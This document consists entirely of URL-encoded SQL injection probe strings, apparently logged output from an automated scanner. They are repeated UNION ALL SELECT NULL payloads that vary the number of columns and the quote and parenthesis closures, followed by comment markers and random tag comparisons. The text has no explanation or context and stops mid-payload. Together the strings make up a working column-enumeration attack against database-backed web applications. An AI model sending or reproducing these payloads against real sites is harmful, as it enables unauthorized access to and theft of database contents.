1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27WXaf%27%20LIKE%20%27WXaf 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27nCRy%27%20LIKE%20%27nCRy 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27mCDK%27%20LIKE%20%27mCDK 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27EzsY%27%20LIKE%20%27EzsY 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22mHhb%22%3D%22mHhb 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22GUcN%22%3D%22GUcN 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22qxQN%22%3D%22qxQN 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Mjvh%22%3D%22Mjvh 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22NDnV%22%3D%22NDnV 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22lyJu%22%3D%22lyJu 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22IIGC%22%3D%22IIGC 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22ulDL%22%3D%22ulDL 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22pgDf%22%3D%22pgDf 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22IKLM%22%3D%22IKLM 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22yMfi%22%3D%22yMfi 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22jRxv%22%3D%22jRxv 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22gulw%22%3D%22gulw 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22UbYZ%22%3D%22UbYZ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22xeJQ%22%3D%22xeJQ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22HQrs%22%3D%22HQrs 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22hEAs%22%3D%22hEAs 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22AJPM%22%3D%22AJPM 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22EOnu%22%3D%22EOnu 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22OHmD%22%3D%22OHmD 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Dsyy%22%3D%22Dsyy 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ZEeU%22%3D%22ZEeU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22XsBE%22%3D%22XsBE 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22zTPk%22%3D%22zTPk 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22vlIC%22%3D%22vlIC 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22wTbY%22%3D%22wTbY 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22FhmM%22%3D%22FhmM 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22jGxY%22%3D%22jGxY 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22HXXo%22%3D%22HXXo 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22CDPs%22%3D%22CDPs 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22koUW%22%3D%22koUW 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22LhIQ%22%3D%22LhIQ 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22coDL%22%3D%22coDL 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Dowh%22%3D%22Dowh 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22eZNj%22%3D%22eZNj 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22uwdA%22%3D%22uwdA 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22aGrc%22%3D%22aGrc 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ZbEG%22%3D%22ZbEG 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22gVTT%22%3D%22gVTT 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ynJs%22%3D%22ynJs 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22TvbA%22%20LIKE%20%22TvbA 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22yhPk%22%20LIKE%20%22yhPk 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22ceWk%22%20LIKE%20%22ceWk 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22vmQK%22%20LIKE%20%22vmQK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22PzDU%22%20LIKE%20%22PzDU 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22AKgK%22%20LIKE%20%22AKgK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22oXsQ%22%20LIKE%20%22oXsQ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22usxs%22%20LIKE%20%22usxs 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22JQsp%22%20LIKE%20%22JQsp 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22OyMt%22%20LIKE%20%22OyMt 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22kvWd%22%20LIKE%20%22kvWd 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22rgAy%22%20LIKE%20%22rgAy 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22CCyY%22%20LIKE%20%22CCyY 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22SWRp%22%20LIKE%20%22SWRp 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22xitK%22%20LIKE%20%22xitK 